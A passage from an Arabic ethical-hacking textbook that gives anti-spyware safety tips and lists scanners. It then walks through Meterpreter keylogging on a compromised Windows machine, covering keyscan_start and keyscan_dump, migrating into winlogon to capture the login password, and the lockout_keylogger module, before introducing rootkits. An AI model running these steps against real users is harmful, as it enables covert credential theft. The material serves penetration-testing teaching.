‫داﺋﻣﺎ ﯾﺟب اﺳﺗﺧدام اﻟﺣذر ﻣﻊ أي ﺷﻲء ﯾوﺟد ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت أﺛﻧﺎء ﺗﻧزﯾل وﺗرﻛﯾب اﻟﺑرﻣﺟﯾﺎت اﻟﺣرة‪ .‬ﻗﺑل ﺗﺣﻣﯾل أي ﺑرﻧﺎﻣﺞ‪،‬‬ ‫‪-‬‬
‫ﺗﺄﻛد ﻣن أﻧﮫ ھو ﻣن ﻣوﻗﻊ ﻣوﺛوق ﺑﮫ‪ .‬ﺗﺄﻛد ﻣن ﺗﺻرﯾﺣﺎت اﺗﻔﺎﻗﯾﺔ اﻟﺗرﺧﯾص‪ ،‬ﺗﺣذﯾر اﻷﻣﺎن‪ ،‬وﺗﺻرﯾﺣﺎت اﻟﺧﺻوﺻﯾﺔ اﻟﺗﻲ ﺗرﺗﺑط ﻣﻊ‬
‫اﻟﺑرﻧﺎﻣﺞ‪ .‬ﯾﻧﺑﻐﻲ أن ﺗﻘرأ ﺟﯾدا ﻟﻠﺣﺻول ﻋﻠﻰ ﻓﮭم واﺿﺢ ﻗﺑل اﻟﺗﺣﻣﯾل‪.‬‬
‫ﻻ ﺗﺳﺗﺧدم وﺿﻊ اﻹدارة ﻣﺎ ﻟم ﺗﻛن ﺿرورﯾﺔ ﻷن اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل ﺑراﻣﺞ اﻟﺗﺟﺳس ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻋﻧدﻣﺎ ﺗﻛون ﻓﻲ وﺿﻊ اﻟﻣﺳؤول‪.‬‬ ‫‪-‬‬
‫وﻧﺗﯾﺟﺔ ﻟذﻟك‪ ،‬ﻗد ﯾﺣﺻل اﻟﻣﮭﺎﺟﻣﯾن ﻋﻠﻰ اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬
‫ﻻ ﺗﺳﺗﺧدم اﻟطرﻓﯾﺎت اﻟﻌﺎﻣﺔ )‪ (public terminal‬ﻟﻠوﺻول إﻟﻰ ﺣﺳﺎب ﻣﺻرﻓﻲ‪ ،‬واﻟﺗﺣﻘﻖ ﻣن ﺑﯾﺎﻧﺎت ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن‪ ،‬واﻷﻧﺷطﺔ‬ ‫‪-‬‬
‫اﻟﺣﺳﺎﺳﺔ اﻷﺧرى‪ .‬اﻷﻧظﻣﺔ اﻟﻌﺎﻣﺔ ﻟﯾﺳت آﻣﻧﺔ ﻋﻠﻰ اﻹطﻼق‪ ،‬وﯾﺗم اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﻗﺑل اﻟﻌدﯾد ﻣن اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬اﻟﺷرﻛﺔ اﻟﺗﻲ ﺗدﯾر‬
‫اﻟطرﻓﯾﺎت اﻟﻌﺎﻣﺔ ﻗد ﻻ ﺗﻔﺣص ﻧظﺎﻣﮭم ﻣن أﺟل ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬
‫ﻻ ﺗﻘوم ﺑﺗﻧزﯾل ﻣﻠﻔﺎت اﻟﻣوﺳﯾﻘﻰ اﻟﻣﺟﺎﻧﯾﺔ‪ ، screensavers،‬أو اﻟوﺟوه اﻟﻣﺑﺗﺳﻣﺔ ﻣن اﻹﻧﺗرﻧت ﻷﻧﮫ ﻋﻧدﻣﺎ ﺗﻘوم ﺑﺗﺣﻣﯾل ھذه اﻟﺑراﻣﺞ‬ ‫‪-‬‬
‫اﻟﻣﺟﺎﻧﯾﺔ ﻓﮭﻧﺎك اﺣﺗﻣﺎل أن ﺗﺄﺗﻲ ﺑﺑراﻣﺞ اﻟﺗﺟﺳس ﻣﺧﻔﯾﮫ ﻣﻌﮫ‪.‬‬
‫اﻟﺣذر ﻣن اﻟﻧواﻓذ أو ﺻﻔﺣﺎت اﻟوﯾب اﻟﻣﻧﺑﺛﻘﺔ‪ .‬ﻻ ﺗﻘوم أﺑدا ﺑﺎﻟﻧﻘر ﻓوق أي ﻣﻛﺎن ﻋﻠﻰ اﻟﻧواﻓذ اﻟﺗﻲ ﺗﻌرض ﻟك رﺳﺎﺋل ﻣﺛل اﻟﺗﻲ ﺗﻘول‬ ‫‪-‬‬
‫ان ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻗد ﯾﻛون ﻣﺻﺎﺑﺎ )‪ ،(your computer may be infected‬أو أﻧﮭﺎ ﯾﻣﻛن أن ﺗﺳﺎﻋد ﺟﮭﺎز‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻟﻠﻌﻣل أﺳرع)‪ . (they can help your computer to run faster‬ﻋﻧد اﻟﻧﻘر ﻋﻠﻰ ھذه اﻟﻧواﻓذ ﺑك ﻗد‬
‫ﺗﺻﺎب ﺑﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬
‫ﺣذف ﻣﻠﻔﺎت ﺗﻌرﯾف اﻻرﺗﺑﺎط )‪ (cookies‬ﺑﺷﻛل داﺋم‪ ،caches ،‬ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ‪ ،‬اﻟﺗﺎرﯾﺦ واﻟﻣﻠﻔﺎت اﻟﻣؤﻗﺗﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‬ ‫‪-‬‬
‫ﻋﻧدﻣﺎ ﯾﺗم ﺗﺻﻔﺢ اﻹﻧﺗرﻧت‪.‬‬
‫ﻻ ﺗﻘم ﺑﺗﺧزﯾن ﻣﻌﻠوﻣﺎت ﺷﺧﺻﯾﺔ أو ﻣﺎﻟﯾﺔ ﻋﻠﻰ أي ﻧظﺎم ﻛﻣﺑﯾوﺗر ﻟﯾس ﺗﺣت ﺳﯾطرﺗك ﺗﻣﺎﻣﺎ‪ ،‬ﻣﺛل اﻟﺗﻲ ﻓﻲ أﺣد ﻣﻘﺎھﻲ اﻹﻧﺗرﻧت‪.‬‬ ‫‪-‬‬

‫‪Ant:-Spyware: PC Tools Spyware Doctor‬‬


‫اﻟﻣﺻدر‪http://www.pctools.com :‬‬
‫‪ PC Tools Spyware Doctor‬ﯾوﻓر اﻟﺣﻣﺎﯾﺔ ﻟﻠﻧظﺎم اﻟﺧﺎص ﺑك ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس واﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ ﻓﻲ ﻏﺎﯾﺔ اﻟﺧطورة‪ .‬ﯾﻛﺷف‬
‫وﯾﻌطل ﻣﺧﺗﻠف اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل ‪ ،Trojans ،adware‬ﻛﯾﻠوﺟرز‪ ،spybots ،‬وﻣﺎ إﻟﻰ ذﻟك ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﻣن اﻟﺳﮭل ﺟدا‬
‫ﺣﻣﺎﯾﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك أو اﻟﻣﺎﻟﯾﺔ ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس ﺑﺎﺳﺗﺧدام ھذا‪ .‬ﺣﺗﻰ اﻟﺗﮭدﯾدات اﻟﺧطﯾرة ﯾﻣﻛن اﻟدﻓﺎع ﺑﺳﮭوﻟﺔ ﻋﻧدﻣﺎ‬
‫ﯾﺗﻛﺎﻣل ھذا اﻟﺑرﻧﺎﻣﺞ ﻣﻊ طﺑﻘﺎت ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺣﻣﺎﯾﺔ‪ .‬ﯾﺗم ﻓﺣص اﻟﻣﻠﻔﺎت ﺟﯾدا ﻣن ﻗﺑل اﻟﺗدﺧل اﻟﻔﻌﻠﻲ ﻟﺑراﻣﺞ اﻟﺗﺟﺳس ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪433‬‬

‫‪Anti-Spywares: other tools‬‬


‫‪ AntiSpyWare‬ﺗﻘوم ﺑﻔﺣص اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ ،‬واﻟﺗﺣﻘﻖ ﻣن وﺟود ﺑراﻣﺞ اﻟﺗﺟﺳس ﻣﺛل اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪ ،‬وﺗروﺟﺎن‪، dialers ،‬‬
‫‪ ، Keyloggers ،worms‬و‪ ، rootkits‬وإزاﻟﺗﮭم إذا ﺗم اﻟﻌﺛور ﻋﻠﻰ أي واﺣد ﻣﻧﮭم‪ AntiSpyWare .‬ﯾوﻓر اﻟﺣﻣﺎﯾﺔ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‬
‫ﻋن طرﯾﻖ ﻓﺣص اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻋﻠﻰ ﻓﺗرات ﻣﻧﺗظﻣﺔ‪ ،‬إﻣﺎ أﺳﺑوﻋﯾﺎ أو ﯾوﻣﯾﺎ‪ .‬ﻓﺈﻧﮫ ﯾﻘوم ﺑﻔﺣص اﻟﻛﻣﺑﯾوﺗر ﻟﺿﻣﺎن ﺧﻠوه ﻣن اﻟﺑرﻣﺟﯾﺎت‬
‫اﻟﺧﺑﯾﺛﺔ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﻛﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪SUPERAntiSpyware available at http://superantispyware.com‬‬
‫‪Spyware Terminator 2012 available at http://www.pcrx.com‬‬
‫‪Ad-Aware Free Antivirus+ available at http://www.lavasoft.com‬‬
‫‪Norton Internet Security available at http://in.norton.com‬‬
‫‪SpyHunter available at http://www.enigmasoftware.com‬‬
‫‪Kaspersky Internet Security 2013 available at http://www.kaspersky.com‬‬
‫‪SecureAnywhere Complete 2012 available at http://www.webroot.com‬‬
‫‪MacScan available at http://macscan.securemac.com‬‬
‫‪Spybot - Search & Destroy available at http://www.safer-networking.org‬‬
‫‪Malwarebytes Anti-Malware PRO available at http://www.malwarebytes.org‬‬

‫‪Key Scan and Lockout Keylogger in Linux‬‬

‫أﺣﯾﺎﻧﺎ ﯾﻛون ﻣﺧﺗﺑر اﻻﺧﺗراق ﻗد ﺗﻣﻛن ﻣن اﻟوﺻول ﻋن ﺑﻌد إﻟﻰ ﺟﮭﺎز اﻟﻣﺳﺗﺧدم‪ ،‬ﻟﻛﻧﮫ ﻗد ﻻ ﯾﻛون ﻋرف ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻣﺳﺗﺧدم‪ .‬رﺑﻣﺎ ﻛﺎن‬
‫اﻟﻣﺳﺗﺧدم ﻟدﯾﮫ ﻛﻠﻣﺔ ﻣرور طوﯾﻠﺔ وﻣﻌﻘدة ﻟﻠﻐﺎﯾﺔ واﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن ﺗﺄﺧذ ﻓﻘط وﻗﺗﺎ طوﯾﻼ ﻟﻛﺳرھﺎ‪ .‬ﻣﺎذا ﯾﻣﻛن أن ﯾﻔﻌل؟‬
‫‪ Meterpreter‬ﻓﻲ إطﺎر ‪ Metasploit‬ﻟﮫ ﻓﺎﺋدة ﻛﺑﯾرة ﻻﻟﺗﻘﺎط ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف واﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮭﺎ ﺳﺎﺑﻘﺎ واﻟﺗﻲ‬
‫ﯾطﻠﻖ ﻋﻠﯾﮭﺎ ‪ .Keyloggers‬ﺳﻧﺑدأ ﻣﻊ اﻟﻧظﺎم اﻟذي ﻗﻣﻧﺎ ﺑﺎﺧﺗراﻗﮫ ﺑﺎﻟﻔﻌل وﻗﻣﻧﺎ ﺑﺈﻧﺷﺎء ﺟﻠﺳﺔ ﻋﻣل ﻧﺎﺟﺣﺔ ﺑﻌﯾده ﻣﻌﮫ ﻣن ﺧﻼل ‪.Metasploit‬‬
‫ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ Meterpreter‬ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ ﻓﻲ ﻧﻔس ھذه اﻟوﺣدة‪.‬‬

‫‪Key Logging with Meterpreter‬‬

‫ﻋﻧد اﻟﻘﯾﺎم ﺑطﺑﺎﻋﺔ اﻟﺗﻌﺑﯾر ‪ help‬ﻓﻲ طرﻓﯾﺔ ‪ Meterpreter‬ﺳوف ﯾﻘوم ﺑﺳرد ﺟﻣﯾﻊ اﻷواﻣر اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣﻊ ‪.Meterpreter‬‬
‫ﻟﻛن ﻣﺎ ﯾﮭﻣﻧﺎ ھﻧﺎ ھو اﺳﺗﺧدام ‪ Meterpreter‬ﻷداء وظﯾﻔﺔ ‪ Keylogger‬وذﻟك ﻟﻣراﻗﺑﺔ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﻟذﻟك ﻣﺎ ﯾﮭﻣﻧﺎ ھﻧﺎ ھو اﺳﺗﺧدام‬
‫اﻻﻣر ‪.keyscan‬‬

‫ﻟذﻟك دﻋوﻧﺎ ﻧﻣﺿﻲ ﻗدﻣﺎ وﻧرى ﻣﺎ ﯾﺑدو ﻋﻠﯾﮫ ﻋﻧدﻣﺎ ﻧﺑدأ اﺳﺗﺧدام ﻛﻠوﻏر ﻋن ﺑﻌد‪ ،‬ﺛم ﻧﻘوم ﺑﻌرض ﺿرﺑﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﺗم اﻟﺗﻘﺎطﮭﺎ‪.‬‬
‫‪ .1‬ﺑﺑﺳﺎطﮫ ﺑﻧدا ﻋﻣﻠﯾﺔ اﻟﺗﺟﺳس ﻋﻠﻰ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋن ﺑﻌد ﺑﻛﺗﺎﺑﺔ اﻻﻣر ‪ keyscan_start‬ﻣن ﺧﻼل طرﻓﯾﺔ ‪.Meterpreter‬‬

‫‪ .2‬اﻵن ﻧﺣن ﺑﺣﺎﺟﺔ ﻓﻘط اﻟﻰ اﻻﻧﺗظﺎر ﺣﺗﻰ ﯾﻘوم اﻟﺿﺣﯾﺔ ﺑﺎﻟﻘﯾﺎم ﺑﺑﻌض اﻷﺷﯾﺎء ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ﻟدﯾﻧﺎ‪ ،‬واﻟﻣﺿﻲ‬
‫ﻗدﻣﺎ وﻓﺗﺢ اﻟﻣﺗﺻﻔﺢ اﻟﺧﺎص ﺑوﯾﻧدوز ‪ ،7‬وإﺟراء ﺑﺣث ﻓﻲ ﺟوﺟل‪.‬‬
‫‪ .3‬اﻵن ﻣرة أﺧرى ﻧرﺟﻊ اﻟﻰ اﻟﻧظﺎم ﻛﺎﻟﻲ‪ ،‬ﻟﻧرى ﻣﺎ ﺗم ﻛﺗﺎﺑﺗﮫ ﺑﺑﺳﺎطﺔ وﯾﺗم ذﻟك ﺑﻛﺗﺎﺑﺔ اﻻﻣر ‪.keyscan_dump‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪434‬‬

‫ھﻧﺎ ﯾﻣﻛﻧك ان ﺗرى ﻣن ھذا اﻟﻌرض أن اﻟﻣﺳﺗﺧدم اﻟﮭدف ﻗﺎم ﺑﻛﺗﺎﺑﺔ "‪ "google.com‬ﻓﻲ ﻣﺗﺻﻔﺢ اﻟوﯾب ﺛم ﻗﺎم ﺑﺎﻟﺑﺣث ﻋن‬
‫" ?‪."Will Dallas go 8 and 8 again this year‬‬
‫ﺣﺳﻧﺎ‪ ،‬ﻣن اﻟواﺿﺢ ان اﻟﻣﺳﺗﺧدم ﻟدﯾﻧﺎ ھو ﻣن ﻣﺣﺑﻲ ﻛرة اﻟﻘدم داﻻس ﻛﺎو ﺑوﯾز‪ .‬دﻋوﻧﺎ ﻧﺣﺎول ﺑﻌض اﻷﺷﯾﺎء اﻷﺧرى‪ .‬ﻣﺎذا ﯾﺣدث إذا ﻗﺎم‬
‫اﻟﻣﺳﺗﺧدم ﺑﺎﺳﺗﺧدام ﻣﻔﺎﺗﯾﺢ ﺧﺎﺻﺔ ﻣﺛل ﻣﻔﺗﺎح وﯾﻧدوز؟ ﻣﺎ إذا ﻛﺎن اﻟﻣﺳﺗﺧدم ﯾﺳﺗﺧدم اﻟﻣﻔﺗﺎح "وﯾﻧدوز" ‪ +‬اﻟﻣﻔﺗﺎح )‪ (I‬ﻟﻘﻔل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬ﺛم‬
‫ﯾﺳﺗﺧدم ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮫ ﻟﻠﺣﺻول ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻣرة أﺧرى؟ أﯾﺿﺎ ﻣﺛﻼ ﻗﺎم اﻟﻣﺳﺗﺧدم ﺑﻘﻔل ﻧظﺎم وﯾﻧدوز اﻟﺧﺎص ﺑﮫ ﻣﻊ ﻣﻔﺗﺎح‬
‫"وﯾﻧدوز" وﻣﻔﺗﺎح "‪ ."L‬ﺛم ﺗﺳﺟﯾل اﻟدﺧول ﻣرة أﺧرى ﻓﻲ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور‪ .‬اﻵن ﻧذھب ﻣرة أﺧرى ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻣﻊ‬
‫‪ keyscan_dump‬ﻟﻧرى ﻣﺎ ﻟدﯾﻧﺎ‪:‬‬

‫ﻛﻣﺎ ﻧرى ان ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻗﺎم ﺑﺎﻟﺿرب ﻋﻠﻰ ﻣﻔﺎﺗﺢ وﯾﻧدوز‪ +‬ﻣﻔﺗﺎح ‪ L‬ﺑﺷﻛل ﺻﺣﯾﺢ واﻟذي ﯾﻘوم ﺑﻐﻠﻖ اﻟﺷﺎﺷﺔ وﻟﻛﻧﮫ ﻗﺎم ﺑﺎﻟﺗﺳﺟﯾل ﻣرة أﺧرى‬
‫ﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻹﻟﻐﺎء ﻏﻠﻖ اﻟﺷﺎﺷﺔ‪ ،‬ﻓﺄﯾن ھﻲ ﻛﻠﻣﺔ اﻟﻣرور؟ ﻟﻣﺎذا ﻟم ﯾﺗم ﺗﺳﺟﯾﻠﮭﺎ!‬
‫اﻟﻣﺷﻛﻠﺔ ھﻲ ﻓﻲ اﻟطرﯾﻘﺔ اﻟﺗﻲ ﯾﻌﻣل ﺑﮭﺎ ﻧظﺎم اﻻﻣن ﻟﻠوﯾﻧدوز‪ .‬ﺣﯾث ﺑﺑﺳﺎطﺔ‪ ،‬أن ﺑﯾﺋﺔ ﺳطﺢ اﻟﻣﻛﺗب ﺗﺧﺗﻠف ﻋن ﺑﯾﺋﺔ ﺗﺳﺟﯾل اﻟدﺧول ﺣﺗﻰ ﻓﻲ‬
‫اﻟﺗﻌرﯾﻔﺎت اﻟﺗﻲ ﺗﺳﺗﺧدﻣﮭﺎ ﻛﻼ اﻟﺑﯾﺋﺗﯾن‪ ،‬وﺟﻠﺳﺔ اﻟﻌﻣل اﻟﻧﺷطﺔ اﻟﺗﻲ ﻗﻣت ﺑﺈﻧﺷﺎﺋﮭﺎ ﻣﻊ اﻟﻧظﺎم اﻟﺿﺣﯾﺔ ﻣن ﺧﻼل ‪ Meterpreter‬ﺗﻛون ﻣﻊ‬
‫)ﺳطﺢ اﻟﻣﻛﺗب( اﻣﺎ ﺑﺎﻟﻧﺳﺑﺔ ل ‪) win logon‬ﻋﻣﻠﯾﺔ دﺧول( ﺣﯾث ﻣن ﺧﻼﻟﮭﺎ ﺗﺳﺗﺧدم ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻣﺧﺗﻠﻔﺔ‪ .‬ﻟذا إذا ﻛﺎﻧت ﺟﻠﺳﺔ اﻟﻌﻣل ﻣﻊ‬
‫ﺳطﺢ اﻟﻣﻛﺗب ﻓﻠن ﺗﺳﺗطﯾﻊ اﻟﺗﻘﺎط اﻟﻣﻔﺎﺗﯾﺢ اﻟﺧﺎﺻﺔ ﺑﻌﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول‪ ،‬أو اﻟﻌﻛس ﺑﺎﻟﻌﻛس‪ .‬ﻟذﻟك ﺳوف ﺗﺣﺗﺎج إﻟﻰ ﻧﻘل ‪ Keyloggers‬اﻟﻰ‬
‫ﺟﻠﺳﺔ اﻟﻌﻣل اﻟﺗﻲ ﺗرﯾد ﻣراﻗﺑﺗﮭﺎ‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﺑﺑﺳﺎطﺔ ﺳوف ﻧﻘوم ﺑﻧﻘل طرﻓﯾﺔ ‪Meterpreter‬اﻟﻰ ﺑﯾﺋﺔ ‪ Winlogon‬ﺑدﻻ ﻣن ﺑﯾﺋﺔ ﺳطﺢ‬
‫اﻟﻣﻛﺗب ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ migrate‬ﺣﺗﻰ ﻧﺟد أﻧﻔﺳﻧﺎ ﻓﻲ اﻟوﺿﻊ اﻟﺻﺣﯾﺢ ﻟﻠﺑﺣث ﻋن ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﺛم ﻧﺑدأ ‪ keyscan‬ﻣرة أﺧرى‪.‬‬
‫‪ .4‬ﻧﻘوم ﺑطﺑﺎﻋﺔ ‪ ps‬ﻓﻲ ﻗذﯾﻔﺔ‪/‬طرﻓﯾﺔ ‪ Meterpreter‬ﻟﻠﺣﺻول ﻋﻠﻰ ﻗﺎﺋم ﺑﺎﻟﻌﻣﻠﯾﺎت اﻟﺗﻲ ﺗﻌﻣل اﻻن‪ .‬ﺛم ﻧﺑﺣث ﻟﻠﺣﺻول ﻋﻠﻰ ‪PID‬‬
‫اﻟﺧﺎص ﺑﺎﻟﻌﻣﻠﯾﺔ ‪.Winlogon‬‬

‫ﺣﯾث ﻛﻣﺎ ﻧرى ﻣن اﻟﺻورة ھذه ان ‪ PID‬اﻟﺧﺎص ﺑﺎﻟﻌﻣﻠﯾﺔ ‪ winlogon.exe‬ھﻲ ‪ 432‬ﻟذﻟك ﺳوف ﻧﺣﺗﺎج اﻟﻰ ﻧﻘل طرﻓﯾﺔ ‪Meterpreter‬‬
‫اﻟﻰ ﺟﻠﺳﺔ )‪ (session‬اﻟﻰ ھذا ال ‪.PID‬‬
‫‪ .5‬ﻧﻘوم ﺑطﺎﺑﻌﺔ اﻻﻣر ‪ migrate‬ﺛم ‪ PID‬ﺣﯾث ﻓﻲ ﺣﺎﻟﺗﻧﺎ ھذه ﺳوف ﯾﻛون ‪.migrate 432‬‬

‫ﻣﻠﺣوظﮫ إذا ﺣﺻﻠت ﻋﻠﻰ رﺳﺎﻟﺔ اﻟﺧطﺄ ‪ insufficient privileges‬ﻓﺳوف ﺗﺣﺗﺎج اﻟﻰ رﻓﻊ ﺻﻼﺣﯾﺎﺗك اﻟﻰ ﺻﻼﺣﯾﺎت اﻟﻧظﺎم ‪system‬‬
‫‪.privileges‬‬
‫‪ .6‬اﻻن ﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻻﻣر ‪ keyscan_start‬ﺛم ﺑﻌد ذﻟك ‪.keyscan_dump‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪435‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام اﻻﺳﻛرﯾﺑت ‪ use post/windows/capture/lockout_keylogger‬ﻣن ﺧﻼل طرﻓﯾﺔ ‪ Meterpreter‬وذﻟك‬


‫ﻟﺗﺗﺑﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬

‫‪HIDING FILES 5.6‬‬

‫ﻣﺛل اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ‪ ،‬ھﻧﺎك أﯾﺿﺎ اﻟﻌدﯾد ﻣن اﻟﺗطﺑﯾﻘﺎت اﻟوﻗﺎﺋﯾﺔ )‪ (protective application‬اﻟﻘﺎدرة ﻋﻠﻰ ﻣﻧﻊ أو ﻛﺷف وﺣذف اﻟﺗطﺑﯾﻘﺎت‬
‫اﻟﺧﺑﯾﺛﺔ‪ .‬ﻣن أﺟل ﺗﺟﻧب أن ﯾﺗم اﻛﺗﺷﺎف اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ ﻣن ﻗﺑل اﻟﺗطﺑﯾﻘﺎت اﻟوﻗﺎﺋﯾﺔ)‪ ، (protective application‬ﺣﯾث ﯾﻘوم اﻟﻣﮭﺎﺟﻣﯾن‬
‫ﺑﺈﺧﻔﺎء اﻟﻣﻠﻔﺎت اﻟﺧﺑﯾﺛﺔ داﺧل ﻣﻠﻔﺎت ﻣﺷروع أﺧرى‪.‬‬

‫‪Rootkits‬‬

‫ﺗﻣﺎﻣﺎ ﻣﺛل‪ ، Metasploit‬ﻋﻧد ﯾﺗم اﻟﺗﻌﺎﻣل ﻷول ﻣره ﻟﻘوة وﻣﻛر ‪ ،Rootkits‬وﻋﺎدة ﻣﺎ ﯾﻛوﻧوا ﻣﻧدھﺷﯾن‪ .‬ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺑﺗدﺋﯾن‪Rootkits ،‬‬
‫ﯾظﮭر ﻟﮭم ﻋﻠﻰ اﻧﮫ ﯾﻣﻠك‪ ،‬ﺳﺣر أﺳود ﺗﻘرﯾﺑﺎ‪ .‬أﻧﮭﺎ ﻋﺎدة ﻣﺎ ﺗﻛون ﺑﺳﯾطﺔ ﻓﻲ ﻋﻣﻠﯾﺔ ﺗﺛﺑﯾﺗﮭﺎ وﯾﻣﻛن أن ﺗﻧﺗﺞ ﻧﺗﺎﺋﺞ ﻣذھﻠﺔ‪ .‬ﺗﺷﻐﯾل ‪Rootkits‬‬
‫ﯾﻣﻧﺣك اﻟﻘدرة ﻋﻠﻰ إﺧﻔﺎء اﻟﻣﻠﻔﺎت واﻟﻌﻣﻠﯾﺎت واﻟﺑراﻣﺞ ﻛﻣﺎ ﻟو ﻟم ﯾﻛوﻧوا أﺑدا ﻣﺛﺑﺗﯾن ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ Rootkits .‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء‬
‫اﻟﻣﻠﻔﺎت ﻋن اﻟﻣﺳﺗﺧدﻣﯾن‪ ،‬وﺣﺗﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻧﻔﺳﮫ‪.‬‬
‫‪ Rootkits‬ھﻲ ﻓﻌﺎﻟﺔ ﺟدا ﻓﻲ إﺧﻔﺎء اﻟﻣﻠﻔﺎت‪ ،‬ﻓﺈﻧﮭﺎ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﻛون ﻧﺎﺟﺣﺔ ﻓﻲ اﻟﺗﮭرب ﺣﺗﻰ ﻣن ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت اﻷﻛﺛر دﻗﮫ‪ .‬ﻋﺎدة ﻣﺎ‬
‫ﯾﻘﺎل إن اﺳم ‪ Rootkits‬ﯾﻛون ﻣﺷﺗﻖ ﻣن ﻛﻠﻣﺔ "‪ ،"root‬ﻛﻣﺎ ھو اﻟﺣﺎل ﻓﻲ اﻟﻣﺳﺗﺧدم اﻟﺟذري أو اﻟﻣﺳﺗﺧدم اﻹداري)‪، (root/admin access‬‬
‫و "‪ "kit‬واﻟﺗﻲ ﺗﻌﻧﻰ ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻟﺗﻲ ﺗم ﺗوﻓﯾرھﺎ ﻣن ﺧﻼل ﺣزﻣﺔ اﻟﺑراﻣﺞ‪.‬‬
‫ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ‪ Rootkits ،‬ﺗﻛون ﻣﺗﺧﻔﯾﮫ ﺗﻣﺎﻣﺎ )‪ .(stealthy‬ﯾﻣﻛن أن ﺗﺳﺗﺧدم ﻟﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻷﻏراض ﺑﻣﺎ ﻓﻲ ذﻟك ﺗﺻﻌﯾد‬
